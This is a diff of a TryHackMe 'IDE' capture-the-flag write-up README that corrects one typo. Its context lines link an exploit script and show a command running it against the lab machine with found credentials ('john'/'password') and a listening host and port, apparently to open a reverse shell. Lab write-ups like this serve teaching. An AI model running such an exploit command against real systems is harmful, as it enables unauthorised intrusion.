Nima-Fr/TryHackMe/IDE/README.md

 Now that we have creds, we can use the exploits.
 I'm gonna leave the exploit [here](files/exploit.py) for you guys, in case you couldn't find it yourself.

 First run the exploit as shown below.
-The exploit needs the url, username, password, and listening host and porn plus the platform:
+The exploit needs the url, username, password, and listening host and port plus the platform:

 ~~~
 └─$ python3 exploit.py http://<MACHINE IP>:62337/ john password <YOUR IP> 4444 linux